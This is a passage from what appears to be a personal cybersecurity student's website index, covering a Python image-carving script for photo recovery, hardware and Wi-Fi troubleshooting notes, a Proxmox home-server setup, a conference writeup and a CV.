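            pos = _skip_subblocks(data, pos + 1)     # +1 skips the LZW minimum code size
        else:
            return None
    return None

SIGNATURES = [(JPEG_SOI, 'jpg', jpeg_end), (PNG_SIG, 'png', png_end),
              (b'GIF87a', 'gif', gif_end), (b'GIF89a', 'gif', gif_end)]

def carve(data):
    '''Return (offset, extension, bytes) for every complete picture found in data.'''
    found, pos = [], 0
    while pos < len(data):
        hits = [(data.find(sig, pos), ext, fn) for sig, ext, fn in SIGNATURES]
        hits = [h for h in hits if h[0] != -1]
        if not hits:
            break
        off, ext, fn = min(hits, key=lambda h: h[0])
        try:
            end = fn(data, off)
        except IndexError:
            end = None
        if end is None:
            pos = off + 1                        # header without a parsable body: keep scanning
            continue
        found.append((off, ext, data[off:end]))
        pos = end                                # resume after the carved file
    return found

# Constructed sample image: structurally valid headers, not viewable pictures.
def _jpeg(scan_data, segments=b''):
    sos = bytes.fromhex('ffda0008010100003f00')  # minimal SOS header (length 8)
    return bytes.fromhex('ffd8') + segments + sos + scan_data + bytes.fromhex('ffd9')

def _png_chunk(ctype, body):
    return len(body).to_bytes(4, 'big') + ctype + body + bytes(4)   # CRC not validated here

THUMB = _jpeg(bytes.fromhex('aabbcc'))
APP1_BODY = b'Exif' + bytes(2) + THUMB
APP1 = bytes.fromhex('ffe1') + (len(APP1_BODY) + 2).to_bytes(2, 'big') + APP1_BODY
PHOTO = _jpeg(bytes.fromhex('1234ff005678'), APP1)     # photo with an embedded thumbnail
PNG = PNG_SIG + _png_chunk(b'IHDR', bytes(13)) + _png_chunk(b'IEND', b'')
GIF = (b'GIF89a' + bytes.fromhex('01000100800000') + bytes(6)          # header, LSD, colour table
       + bytes.fromhex('2c') + bytes(9) + bytes.fromhex('02024c01003b'))  # image, LZW data, trailer
SAMPLE_IMAGE = bytes.fromhex('00ffd900') + PHOTO + bytes(5) + PNG + JPEG_EOI + GIF + bytes(3)
```

Running carve(SAMPLE_IMAGE) returns the three files at their correct offsets and lengths, while naive_jpeg_end(SAMPLE_IMAGE, 4) stops at the thumbnail's EOI and would hand back a truncated photo. On a real disk image, read the file with open(path, 'rb') and pass the bytes (or a memory-mapped view) to carve; the walkers return None for headers whose bodies are damaged, so those are skipped rather than carved as garbage.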
Two good resources that list file magic numbers are:\nWikipedia link FileSig link While I did create a Python script at Github Link, I was having some issues extracting pictures. The issue was that my script was finding multiple 0xFFD9 (JPEG end-of-image) sequences where I only expected there to be one. The most likely cause is that camera JPEGs usually carry an embedded EXIF thumbnail, which is itself a complete JPEG with its own FFD8/FFD9 markers, so a carver that stops at the first FFD9 truncates the photo. I could have spent time fixing my script, but there could have been other issues with it that I wasn\u0026rsquo;t aware of, and I didn\u0026rsquo;t want to risk missing some of the information or corrupting pictures. (As a side note, I could always have taken another copy from the phone\u0026rsquo;s memory, and the Python script wasn\u0026rsquo;t writing to the disk image, so I was more worried here about image fidelity and accuracy than about loss of the data.)\nGiven this, I decided to leave my Python script as a learning project and to use a popular open source tool named Autopsy. It was able to recover more types of data than I had coded for in my Python script, and gave a nice structured output that looked like this:\nThe Autopsy output, with a sample image file selected. You can see that these files are marked as deleted by the file system but were still recovered. All said and done, I recovered 85 photos and was able to give them to my mom!\n","date":"11 September 2024","externalUrl":null,"permalink":"/misc/phone-recovery/","section":"Miscellaneous","summary":"","title":"Phone Recovery","type":"misc"},{"content":"","date":"29 August 2024","externalUrl":null,"permalink":"/tags/hardware/","section":"Tags","summary":"","title":"Hardware","type":"tags"},{"content":"","date":"29 August 2024","externalUrl":null,"permalink":"/projects/home-server/","section":"Projects","summary":"","title":"Home Server","type":"projects"},{"content":"A couple of years ago, I bought a new keyboard. A Keychron K10, to be exact. 
I chose that model because it was a full-size keyboard, including both a function key row and a number pad.\nWhen I first bought the keyboard, it worked great! It was replacing a Corsair K55 that had become too “gamery” for my tastes. The K10 came with a mechanical switch comparable to a Cherry MX Red. I thought that would still be too loud, so I purchased the silent switches and planned to replace them. After I replaced the switches, I noticed that the 9 key on my number pad was not working. Oh well, I didn’t use that key very often anyway; or so I thought.\nAfter about a year and a half of owning the keyboard, the c key also stopped working. That was a bigger issue. Supposedly you don’t know what you have until it’s gone, and I noticed very quickly. Not only does the letter c make up about 2.8% of the letters in English text (per Wikipedia), but it’s also used by me, and most people, for ctrl+c to copy. Not only could I not copy/paste with my keyboard (nothing a macro for my mouse wouldn’t fix), but I also had to dedicate my copy buffer to the letter c so that I could paste it with ctrl+v. To say it was infuriating was an understatement.\nI reached a point where, to type the letter c on my other computers, I would reflexively reach for ctrl+v. This persisted for the better part of 3 months. I told myself that I would fix it or buy a new keyboard, and simply threw it on the pile of things I had to do.\nWell, today was the day. I finally had enough of pasting the letter c.\nThe first thing I did was to research how you should take apart the keyboard. Keychron has some pretty good documentation available on their website, linked here.\nI first took off the keycaps. Then, I took off the switches. After I took the switches off, I replaced the hot-swappable PCB sockets that the switch pins seat into, on both the C key and the 9 key. Then I reassembled the rest of the keyboard. Update as of 9/24/2024: The C key is now working intermittently. 
The 9 key is fine, but I am at a loss as to why I’ve been having so many troubles with this key. I am going to replace the switch and socket one last time, and if doing that (and opening the keyboard up again) doesn’t fix it, I will be buying a new keyboard. Preferably a SteelSeries.\nUpdate as of 12/2024: I ended up replacing the keyboard with a SteelSeries Apex 3. It was a great choice.\n","date":"29 August 2024","externalUrl":null,"permalink":"/misc/keyboard-repair/","section":"Miscellaneous","summary":"","title":"Keyboard Repair","type":"misc"},{"content":" 2026: Forensics Capstone Project. Coming in May 2026.\n2025: Hugo Website. Rambling about the design of my website and the shift from WordPress.\n2024: Homelab. Reverse proxy routing + SSO + SSL + hosting as many of my own services as possible. What could go wrong?\n2021: Appalachian Trail Thru Hike. 2,190 miles of rain, mud, and mountains; in pictures and words! (This content doesn't exist yet... coming soon!)\n","date":"29 August 2024","externalUrl":null,"permalink":"/projects/","section":"Projects","summary":"","title":"Projects","type":"projects"},{"content":"","date":"29 August 2024","externalUrl":null,"permalink":"/tags/proxmox/","section":"Tags","summary":"","title":"Proxmox","type":"tags"},{"content":"I kept having intermittent issues with my Wi-Fi where devices would spontaneously lose their connection to the internet, sometimes for up to a minute at a time. There was no predictable pattern, which made it hard to isolate (in hindsight, I should\u0026rsquo;ve been checking the router logs. Oh well!). One of the isolation steps I tried was substituting another router for the ISP-provided one. This seemed to work for a time, until it happened again. 
I vowed to myself that I would fully get to the bottom of this later, when I had more time.\nOne night, I was SSH\u0026rsquo;ing into my Debian VM on Proxmox and the connection kept dropping. After about the second time, I wanted to see if this was an issue connecting to the internet, or just something internal. For reference, I was connected over Wi-Fi, and the homelab is connected with a Cat 6e cable. Everything after that is virtual networking in Proxmox. See that here. What I ended up doing was running ping -t 8.8.8.8 from my Windows machine, and I noticed that after a few minutes a single ping request dropped at the same moment my SSH session closed abruptly. Okay, so now what?\nI was very confused at this point, unsure whether the issue was internal or external. If the issue was the router, shouldn\u0026rsquo;t swapping it have helped? If the issue was outside of my home network (such as upstream congestion, or a hardware problem with the home connection), then why was my SSH session to an internal server dropping? It made no sense. 
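One way to settle the internal-versus-external question is to probe both segments at the same time and compare when they fail: if a LAN host (the Proxmox box) and an internet host (8.8.8.8) stop answering in the same second, the fault is on the path they share, which from a Wi-Fi client is the wireless link or the router; if only the internet host drops, the fault is upstream of the router. The following Python is an added example, not the author's script: it groups timeouts from two concurrent ping runs into outage intervals and classifies each one. The probe series are constructed inline, and the targets and timestamps are assumptions.

```python
# Added example (not the author's script): probe a LAN host and a WAN host at the
# same time and classify each outage by which of the two lost replies.
from datetime import datetime, timedelta

def outages(samples, gap=timedelta(seconds=2)):
    '''Group failed probes into (first_failure, last_failure) intervals.

    samples: iterable of (datetime, replied) pairs, one per ping.
    Failures no more than gap apart are treated as a single outage.'''
    intervals = []
    for ts, replied in sorted(samples):
        if replied:
            continue
        if intervals and ts - intervals[-1][1] <= gap:
            intervals[-1] = (intervals[-1][0], ts)      # extend the current outage
        else:
            intervals.append((ts, ts))                 # start a new one
    return intervals

def overlaps(a, b, slack=timedelta(seconds=1)):
    '''True if intervals a and b touch, with slack for probes that are not in lockstep.'''
    return a[0] <= b[1] + slack and b[0] <= a[1] + slack

def localize(lan_samples, wan_samples):
    '''Return [(outage_start, verdict)] sorted by time.

    LAN and WAN fail together -> the shared path: the client link (Wi-Fi) or the router.
    Only WAN fails            -> upstream of the router (modem / ISP).
    Only LAN fails            -> the LAN host itself or its switch port.'''
    lan, wan = outages(lan_samples), outages(wan_samples)
    verdicts = []
    for o in lan:
        shared = any(overlaps(o, w) for w in wan)
        verdicts.append((o[0], 'client link or router' if shared else 'lan host'))
    for o in wan:
        if not any(overlaps(o, l) for l in lan):
            verdicts.append((o[0], 'upstream'))
    return sorted(verdicts)

def report(lan_samples, wan_samples):
    '''Same verdicts with the start time rendered as HH:MM:SS for printing or logging.'''
    return [(when.strftime('%H:%M:%S'), verdict) for when, verdict in localize(lan_samples, wan_samples)]

# Constructed probe series (assumed targets: the Proxmox host on the LAN and 8.8.8.8),
# one probe per second starting 20:51:50, with the failed seconds chosen by hand.
def probe_series(start, seconds, failed):
    return [(start + timedelta(seconds=i), i not in failed) for i in range(seconds)]

T0 = datetime(2025, 9, 6, 20, 51, 50)
LAN_SAMPLES = probe_series(T0, 20, {11, 12, 13})        # 20:52:01-20:52:03: no reply from the LAN host
WAN_SAMPLES = probe_series(T0, 20, {11, 12, 13, 18})    # same window, plus a lone drop at 20:52:08

if __name__ == '__main__':
    for when, verdict in report(LAN_SAMPLES, WAN_SAMPLES):
        print(when, verdict)
```

To use it on real data, timestamp each line of two concurrent ping -t runs (one against the gateway or a wired LAN host, one against 8.8.8.8) and convert each line into a (datetime, replied) pair; a drop that shows up on both at once is the Wi-Fi link or the router, which a router swap alone would not have proven either way.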
Finally, after peeking through the router logs, I think I found the candidate.\n2025 Sep 6 20:52:01 arc_wlsta_monitor info [WIFI.6][SYS]BSS=ath1 ACTION=disassociate, BSSID=[REDACTED], PHY RATE=1 Mbps, TXOP=76, STA=[REDACTED], RSSI=0, RATE=0 Mbps\n2025 Sep 6 20:51:56 arc_wlsta_monitor info [WIFI.6][SYS]BSS=ath1 ACTION=associate, BSSID=[REDACTED], PHY RATE=72 Mbps, TXOP=83, STA=[REDACTED], RSSI=-71, RATE=2 Mbps\nRead newest-first, the station associated at 20:51:56 with an RSSI of -71 dBm (a marginal signal) and was disassociated five seconds later. As much as I love with all my heart watching cmd ping replies scroll by, I couldn\u0026rsquo;t take it anymore, so I crafted a quick little script:\n$lastOk = Get-Date\nping -t [REDACTED] | ForEach-Object {\n    # Flag anything that is not a normal reply, not only the timeout case\n    if ($_ -match \u0026#34;Request timed out|Destination host unreachable|General failure\u0026#34;) {\n        $time = Get-Date -Format \u0026#34;yyyy-MM-dd HH:mm:ss\u0026#34;\n        Write-Host \u0026#34;$time ALERT: $_\u0026#34; -ForegroundColor Red\n    } else {\n        # Every 5 minutes, print a heartbeat\n        if ((Get-Date) -gt $lastOk.AddMinutes(5)) {\n            $time = Get-Date -Format \u0026#34;yyyy-MM-dd HH:mm:ss\u0026#34;\n            Write-Host \u0026#34;$time Looks good\u0026#34; -ForegroundColor Green\n            $lastOk = Get-Date\n        }\n    }\n}\n","date":"29 August 2024","externalUrl":null,"permalink":"/misc/troubleshooting-wifi-interference/","section":"Miscellaneous","summary":"","title":"Troubleshooting Wifi Interference","type":"misc"},{"content":"I am a computer and cybersecurity nerd who knows just enough to be dangerous. I am passionate about password managers, self-hosting, and open source software. This website is a place for me to demonstrate some of the technologies that I\u0026rsquo;ve worked with, and to house documentation of my projects.\nCurrently, I attend George Mason University. I have received an undergraduate degree in Cybersecurity, and I am currently a graduate candidate in Digital Forensics. I can be found spending my time analyzing disk images, spinning up virtual machines, or tinkering with some new technology. 
I am currently learning to reverse engineer malware and analyzing novel artifacts left behind by AI-integrated browsers.\nAreas of Interest include: # Malware Analysis (Static \u0026amp; Dynamic), Reverse Engineering (Hardware/Software), Open source software, Password managers\nSome of my most commonly used tools are: # Virtualization: Windows Subsystem for Linux, Docker, VMware, VirtualBox, Proxmox\nForensics: Autopsy, REMnux, HxD, DB Browser for SQLite, ALEAPP\nMisc: Hugo (what this site is built using), Cloudflare Zero Trust \u0026amp; Tunnels, SQLite\nLanguages: Python, C, PowerShell, Bash\nIn my free time, I like to read, hike, bike, and play board games with my family. I\u0026rsquo;ve hiked the entirety of the 2,200-mile Appalachian Trail, and plan to complete more thru-hikes.\nHere is the link to my current CV.\n","date":"19 August 2024","externalUrl":null,"permalink":"/about/","section":"Welcome to my website!","summary":"","title":"About Me","type":"page"},{"content":"I was given a ticket to MITRE ATT\u0026CK con 5. This is my writeup. I haven\u0026rsquo;t yet decided if I like the carousel above or the image gallery below more. Let me know what you think!\n“Visibility without actionability is an expensive waste of time” # -Allie Mellen # I haven\u0026rsquo;t yet mustered up the effort to finish writing this part up, but it is on my shortlist. # As part of my undergraduate program, I had a class where I was required to attend a professional networking event. I was fortunately one of the two students given a pass to MITRE ATT\u0026amp;CK Con 5.0. Most of my experience with the ATT\u0026amp;CK framework came from my internship, where I used it to map cybersecurity objectives to business functions. 
At this conference I was able to hear from a few different speakers who talked about the direction of SOC and detection engineering work, giving me an executive-level glimpse into the security career I was hoping to join.\nThe first person to speak was Allie Mellen. With a background in advising the executives responsible for SOCs, she understood the problems facing modern SOCs. Her main point was that SOCs cannot simply be automated away: detection rules are a limited set of constraints on software, and attackers actively try to sidestep them. She also talked about how SOC analysts generally have a hard time advancing in their careers, because their work is focused primarily on closing tickets, which makes it difficult to grow their job responsibilities. She also talked about how SOC teams are overwhelmed: there is too much data, there are too many tools, and there are too many analytics. A more sustainable model for SOCs, she argued, is to switch to a detection engineering approach, with an agile process for building response playbooks. This furthers and refines the skill set of each individual SOC analyst. She also warned that SOCs can be lured into a false sense of confidence by an overwhelming number of metrics that are not always indicative of real success or failure.\n","date":"19 August 2024","externalUrl":null,"permalink":"/networking-events/mitre-attck/","section":"Networking Events","summary":"","title":"MITRE ATT\u0026CK Con 5.0","type":"networking-events"},{"content":"","date":"14 January 2024","externalUrl":null,"permalink":"/tags/self-hosting/","section":"Tags","summary":"","title":"Self Hosting","type":"tags"},{"content":"This is what the \u0026lsquo;small\u0026rsquo; process of getting a home server up and running is like. Strap in, this is a long one. 
# When I was 15, I built myself my first gaming computer. At the time, it had great hardware: an almost top-of-the-line GTX 1070, an i7-6700K, and 32 GB of RAM. What more could a kid in high school ask for? It was able to handle modern gaming demands for about 7 years before the cracks started to show, so I had to upgrade. When I did that, I was left with the old chassis, hard drives, CPU, and a few other miscellaneous components. I did not have a plan for what to do with them, so the components sat in a closet for a few years.\nSome time later, during my community college education, I was introduced to the idea of self-hosted services. The idea of having your own server where photos are accessible over the internet, your own custom home automation server, a server for your camera recordings to live on, a recipe hosting website; the possibilities were endless. This realization occurred around the time I was learning about virtualization, and my love for a home server was born!\nOf course, it took some time until I had created the first iteration. My initial setup was not virtualized, hogged memory, and was not well configured. I did have a working setup, though. Eventually, the upkeep of the already deprecated software became too much for me (along with data loss concerns!), so I shut the project down.\nIn 2024, I purchased a Dell Optiplex 3050. It was formerly a corporate thin client. The reason I chose this computer for my home hosting is that I wanted something small, quiet, and with minimal energy drain. Measuring at the wall while idling, I have recorded approximately a 5 W power draw. Not bad! One of the first things I did after I bought the computer was upgrade both the memory and the storage capacity. Next, I installed Proxmox VE, a type 1 hypervisor (a Debian-based host running KVM on the bare metal). That process had many bumps along the road. 
While setup guides did exist, I had modifications I wanted to make and still only a rudimentary understanding of SSL certs, Linux networking, when to use an LXC container vs a VM, et cetera.\nThe learning curve to create this tech stack was quite steep, but eventually the day finally arrived that I told myself I would sit down and finish setting up my server. I had been having persistent issues getting access for a few days before school took over and I had to put it on the back burner. The first issue was that I was not able to access the web-based GUI to create any virtual machines. For this, I first moved the server from a wireless connection to a wired one. That did not resolve my issue, so I assumed there was an issue with the IP addressing. To fix this, I went into the /etc/network/interfaces file. It took me a while to understand the function of the vmbr0 interface, which is a Linux bridge that the VMs\u0026rsquo; virtual NICs attach to, with the physical NIC (enp1s0) as its only bridge port. It took even longer and more trial and error before I had the bridge ports set up correctly, as you can see by my hastily commented lines below.\nI do not have a “before” version, but this is what it looks like as a result of my tinkering:\niface lo inet loopback\n#iface wlp2s0 inet manual\nauto enp1s0\niface enp1s0 inet manual\n# address 192.168.1.56\n# gateway 192.168.1.1\nauto vmbr0\niface vmbr0 inet static\naddress 192.168.1.57\ngateway 192.168.1.1\nbridge-ports enp1s0\nbridge-stp off\nbridge-fd 0\nsource /etc/network/interfaces.d/*\nThis helped me confirm layer 3 access to the server using ping, but I still had the issue of actually getting to the management portal.\nAfter some time reading online about it, I saw some forum discussions mentioning that it might have been an issue with the certificates. I doubted that, as I wasn’t able to get access over HTTP either (in hindsight, the Proxmox portal is only served over HTTPS on port 8006, so a failed plain-HTTP attempt did not rule the certificates out), but at that point I had tried a lot of potential solutions and figured it wouldn’t hurt. So I ran the following commands:\nThe portal still wasn’t accessible. 
To verify the port was open, I used the command ss -ln, which returns some pretty ugly output:\nss -ln output So, I piped it through grep for 8006 to confirm that the port was actually open and listening for traffic. It was, which I thought was strange: if something was listening on 8006, I should have been able to see the management portal. So I ran systemctl to see what the status was and got back this:\nsystemctl output Obviously, something was wrong with the pve-cluster service on the host, which the web services depend on. So I shut it down and used journalctl to find out what was wrong. After some extensive googling, forum reading, and poring over the documentation (this is a case of RTFM), I found that if any files exist at /etc/pve, the service fails to start because it cannot mount its cluster file system (pmxcfs) over a non-empty directory. So I ran the following commands:\nLo and behold, I was able to start the service and access the web interface. This was an excellent way to get familiar with the virtual networking used in Proxmox, as well as the Linux filesystem and general command-line usage. Now, onto the fun parts: hosting virtual services!\n","date":"14 January 2024","externalUrl":null,"permalink":"/projects/home-server/1/","section":"Projects","summary":"","title":"Self-Hosting introduction","type":"projects"},{"content":" The Trail Provides. 
","date":"29 August 2021","externalUrl":null,"permalink":"/projects/at-hike/","section":"Projects","summary":"","title":"Appalachian Trail Thru Hike","type":"projects"},{"content":"","externalUrl":null,"permalink":"/authors/","section":"Authors","summary":"","title":"Authors","type":"authors"},{"content":"🛰️ Networking: Events, takeaways, and contacts from meetups and conferences.\n📚 Classwork: Notes, labs, and write‑ups from courses.\n🧰 Projects: Build logs, case studies, and demos.\n🎖️ Certifications: Exam prep, notes, and results.\n🧩 Miscellaneous: Everything that doesn’t fit neatly elsewhere.\n","externalUrl":null,"permalink":"/categories/","section":"Welcome to my website!","summary":"","title":"Categories","type":"page"},{"content":"Contact Me ","externalUrl":null,"permalink":"/contact/","section":"Welcome to my website!","summary":"","title":"Contact","type":"page"},{"content":"Download PDF CV\nSummary # Cybersecurity and digital forensics graduate student with hands-on experience in vulnerability assessment, firewall management, automated pentesting administration, and technical security research. Currently seeking roles in Digital Forensics \u0026amp; Incident Response.\nExperience # Cybersecurity Project Lead \u0026ndash; JSI Telecom # Jan. 2026 - May 2026\nCybersecurity Intern \u0026ndash; US House of Representatives # Oct. 2025 - Jan. 2026\nCybersecurity Intern \u0026ndash; Vicinity Energy # May 2024 - May 2025\nDesigned and implemented an organization-wide host-based firewall using CrowdStrike Falcon. Created custom PowerShell scripts for patch management across 700+ endpoints with an RMM tool. Improved detection and alerting workflows in endpoint security tooling. Detected an insider threat and created a report for senior management. Education # M.S. in Digital Forensics, Concentration in Pentesting \u0026amp; Reverse Engineering # George Mason University\nMay 2026\nB.A.S. 
in Cybersecurity # School name\nGraduation\nCertifications # CompTIA Security+ \u0026ndash; Obtained October 2025\nCompTIA CySA+ \u0026ndash; Estimated: June 2026\nSkills # Security: vulnerability assessment, firewall administration, network analysis, malware analysis\nTools: Wireshark, Kali Linux, Pentera, Docker, Proxmox\nSystems: Debian, Linux administration, virtualization, scripting\nLanguages: Python, Bash, PowerShell\nProjects # Project Name # Short description of what it does, what you built, and the key technologies.\nProject Name # Short description.\nLinks # GitHub: https://github.com/writeblocked LinkedIn: https://linkedin.com/in/hiller-hoover Website: https://hhoover.net ","externalUrl":null,"permalink":"/resume/","section":"Welcome to my website!","summary":"A summary of my IT, cybersecurity, and digital forensics experience.","title":"CV","type":"page"},{"content":" What is a \u0026ldquo;now\u0026rdquo; page? # A now page shares what you’d tell a friend you hadn’t seen in a year. Inspired by Derek Sivers.\nI\u0026rsquo;ve graduated from GMU with my master\u0026rsquo;s and landed an Incident Response role at IBM! Life is great for me at the moment. I\u0026rsquo;ll be going to Norway to see my girlfriend for 2 months this summer, and I don\u0026rsquo;t begin my job until late September.\nHere are my current short-term goals:\nGraduate with my Master\u0026rsquo;s degree in Digital Forensics (May 2026)\nFinish updating this website\nComplete my upcoming sprint triathlon on June 8th\nGet the Security+\nGet the CySA+\nSecure a job after my degree\nLast updated: May 21st, 2026 # ","externalUrl":null,"permalink":"/now/","section":"Welcome to my website!","summary":"","title":"Now","type":"page"}]